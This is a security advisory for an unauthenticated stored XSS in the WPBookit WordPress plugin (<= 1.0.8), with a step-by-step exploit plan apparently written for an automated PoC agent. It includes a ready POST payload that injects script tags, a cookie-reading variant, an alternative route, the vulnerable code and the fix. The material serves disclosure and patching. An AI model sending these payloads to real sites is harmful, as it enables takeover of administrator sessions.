WPBookit <= 1.0.8 - Unauthenticated Stored Cross-Site Scripting via 'wpb_user_name' and 'wpb_user_email' Parameters
Description
The WPBookit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpb_user_name' and 'wpb_user_email' parameters in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:NTechnical Details
What Changed in the Fix
Changes introduced in v1.0.9
Source Code
WordPress.org SVNThis plan outlines the steps to exploit a Stored Cross-Site Scripting (XSS) vulnerability in the **WPBookit** plugin (<= 1.0.8). The vulnerability exists because unauthenticated users can submit booking requests containing malicious scripts in the `wpb_user_name` and `wpb_user_email` parameters, whi…
Show full research plan
This plan outlines the steps to exploit a Stored Cross-Site Scripting (XSS) vulnerability in the WPBookit plugin (<= 1.0.8). The vulnerability exists because unauthenticated users can submit booking requests containing malicious scripts in the wpb_user_name and wpb_user_email parameters, which are subsequently rendered without escaping in the WordPress administrative dashboard.
1. Vulnerability Summary
- Vulnerability: Unauthenticated Stored Cross-Site Scripting (XSS).
- Target Parameters:
wpb_user_name,wpb_user_email. - Vulnerable Component: The
add_bookingAJAX route handled byWPB_Bookings_Controller@add_booking. - Sink: The admin dashboard pages for "Bookings" and "Guest Users," where the injected strings are rendered via JavaScript template literals in DataTables (
Booking.jsandGuest-Users.js). - Reason: The plugin fails to sanitize user input before storage and fails to escape the data before rendering it in the admin interface via JavaScript.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
wpb_ajax_post - Route Name:
add_booking - Authentication: None (Unauthenticated).
- Preconditions: The plugin must be active. At least one "Booking Type" (calendar) should ideally exist, though the injection may occur even if the booking fails, as long as the guest data is processed.
3. Code Flow
- Entry Point: An unauthenticated user sends a POST request to
admin-ajax.phpwithaction=wpb_ajax_post. - Route Handling:
WPB_Routes_Handler::wpb_ajax_post(inclass.wpb-admin-routes-handler.php) catches the request. - Route Definition: It looks up the
add_bookingroute inclass.wpb-admin-routes.php.'add_booking' => [ 'method' => 'post', 'action' => 'WPB_Bookings_Controller@add_booking', 'nonce' => 0, // No nonce required 'module' => 'bookings-controller' ], - Processing: Since
nonceis0, the handler skips nonce verification and callsWPB_Bookings_Controller::add_booking. - Storage: The controller processes
wpb_user_nameandwpb_user_emailand stores them in the database (typically in a guests or bookings table). - Admin Rendering (The Sink):
- An administrator navigates to the "Bookings" page.
Booking.jsperforms an AJAX GET request to thebooking_listroute.- The server returns JSON containing the malicious strings.
- The DataTable
renderfunction inBooking.jsinjects the strings into the DOM:"render": function (data, type, row) { return `<div class="d-flex align-items-center gap-3"> ... <h6 class="iq-sub-label">${data}</h6> // data is wpb_user_name <p class="mb-0">${row.email}</p> // email is wpb_user_email </div>`; }
4. Nonce Acquisition Strategy
- Analysis: According to
core/admin/classes/class.wpb-admin-routes.php, theadd_bookingroute explicitly sets'nonce' => 0. - Bypass: In
WPB_Routes_Handler::wpb_ajax_post, the code checksif ($route['nonce'] === 1). Since it is0, the entire nonce verification block is bypassed. - Conclusion: No nonce is required for this exploit.
5. Exploitation Strategy
The exploit will be delivered via a single unauthenticated POST request.
Step 1: Identify/Create a Booking Type (Optional but recommended)
The plugin needs a valid wpb_booking_type ID. If none exists, the request might fail.
- Check existing booking types:
wp post list --post_type=wpb_booking_type(if stored as CPT) or check the tablewp_wpbookit_booking_types.
Step 2: Submit Malicious Booking
Send the payload using the http_request tool.
- URL:
https://<target>/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Payload:
action=wpb_ajax_post &route_name=add_booking &wpb_user_name=<script>alert('XSS_NAME')</script> &wpb_user_email=attacker@example.com"><script>alert('XSS_EMAIL')</script> &wpb_booking_type=1 &wpb_booking_date=2025-12-30 &wpb_booking_slot_time=10:00-11:00 &wpb_phone_number=1234567890
6. Test Data Setup
- Activate Plugin: Ensure
wpbookitis installed and active. - Create Booking Type: If the plugin is fresh, create at least one booking type so an ID exists.
wp eval "/* Logic to insert a row into wpb_booking_type table if needed */"
- Note for PoC Agent: The unauthenticated
add_bookingroute is the primary target. Even if the booking itself fails due to date/time constraints, the plugin often registers the "Guest" details first.
7. Expected Results
- The server should respond with a JSON object (likely
{"status": true, ...}or a success message). - The malicious strings will be stored in the database.
- When an admin logs in and visits
wp-admin/admin.php?page=wpbookit-bookingsor the Guest Users page, the browser will executealert('XSS_NAME').
8. Verification Steps
- Check Database: Use WP-CLI to verify the payload is stored.
wp db query "SELECT guest_name, guest_email FROM wp_wpbookit_guests ORDER BY id DESC LIMIT 1;" - Check AJAX Response: Simulate the admin's view by requesting the booking list (requires admin cookies).
Verify the output contains the unescaped# (In script) Log in as admin, then: http_request "https://<target>/wp-admin/admin-ajax.php?action=wpb_ajax_get&route_name=get_guest_list"<script>tags.
9. Alternative Approaches
- If
add_bookingfails: Try theregister_customerroute.- In
class.wpb-admin-routes.php,register_customeralso hasnonce => 0. - Endpoint:
action=wpb_ajax_post&route_name=register_customer. - This might also populate the Guest or Customer lists seen by the admin.
- In
- DOM Sink Verification: If
alert()is blocked/fails, usebrowser_navigateto the bookings page and check for the presence of the script tag in the rendered DOM usingbrowser_eval.
Summary
The WPBookit plugin for WordPress is vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) via the 'wpb_user_name' and 'wpb_user_email' parameters. This occurs because the plugin fails to sanitize user-provided booking information and subsequently renders it in the admin dashboard using JavaScript template literals without proper escaping.
Vulnerable Code
// core/admin/classes/class.wpb-admin-routes.php:40 'add_booking' => [ 'method' => 'post', 'action' => 'WPB_Bookings_Controller@add_booking', 'nonce' => 0, // No nonce required, allowing unauthenticated access 'module' => 'bookings-controller' ], --- // core/admin/assets/src/module/Booking.js:84 "columns" : wp.hooks.applyFilters('wpb_booking_datatable_columns',[ { "data": "name", "render": function (data, type, row) { return `<div class="d-flex align-items-center gap-3"> <img class="rounded-pill img-fluid avatar-40" src="${row.profile_img}" alt="" loading="lazy"> <div class="media-support-info"> <h6 class="iq-sub-label">${data}</h6> <p class="mb-0">${row.email}</p> </div> </div>`; }, "name": 'booking_name', "searchable": false },
Security Fix
@@ -88,8 +88,8 @@ return `<div class="d-flex align-items-center gap-3"> <img class="rounded-pill img-fluid avatar-40" src="${row.profile_img}" alt="" loading="lazy"> <div class="media-support-info"> - <h6 class="iq-sub-label">${data}</h6> - <p class="mb-0">${row.email}</p> + <h6 class="iq-sub-label">${_.escape(data)}</h6> + <p class="mb-0">${_.escape(row.email)}</p> </div> </div>`; @@ -250,12 +250,12 @@ let model = jQuery(this.bookingViewModel._element) - model.find('.wpb-booking-type').html(type) - model.find('.wpb-booking-date-time').html(formattedDateTime) - model.find('.wpb-booking-duration').html(duration) - model.find('.wpb-booking-user-email').html(email) - model.find('.wpb-booking-created').html(formatedate_created) - model.find('.wpb-booking-questions').html('') + model.find('.wpb-booking-type').text(type) + model.find('.wpb-booking-date-time').text(formattedDateTime) + model.find('.wpb-booking-duration').text(duration) + model.find('.wpb-booking-user-email').text(email) + model.find('.wpb-booking-created').text(formatedate_created) + model.find('.wpb-booking-questions').empty()
Exploit Outline
1. **Identify the Target Endpoint**: The vulnerability is triggered via the AJAX handler in `/wp-admin/admin-ajax.php` using the action `wpb_ajax_post`. 2. **Craft Malicious Payload**: Prepare a POST request targeting the `add_booking` route. This route is configured with `nonce => 0`, meaning it does not require an AJAX nonce or user authentication. 3. **Inject Payload**: Set the `wpb_user_name` or `wpb_user_email` parameters to a malicious script, such as `<script>alert(document.cookie)</script>`. 4. **Submit Request**: Send the POST request to the server. Parameters like `wpb_booking_type`, `wpb_booking_date`, and `wpb_booking_slot_time` should be included to ensure the booking logic processes the guest data. 5. **Persistence**: The plugin stores the guest information in the database (e.g., `wp_wpbookit_guests` table) without sanitization. 6. **Trigger Execution**: The exploit executes when an authenticated administrator visits the 'Bookings' or 'Guest Users' sections of the WPBookit dashboard. The administrative interface fetches the stored records via AJAX and injects them into the DOM using unescaped template literals in `Booking.js` or `Guest-Users.js`.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.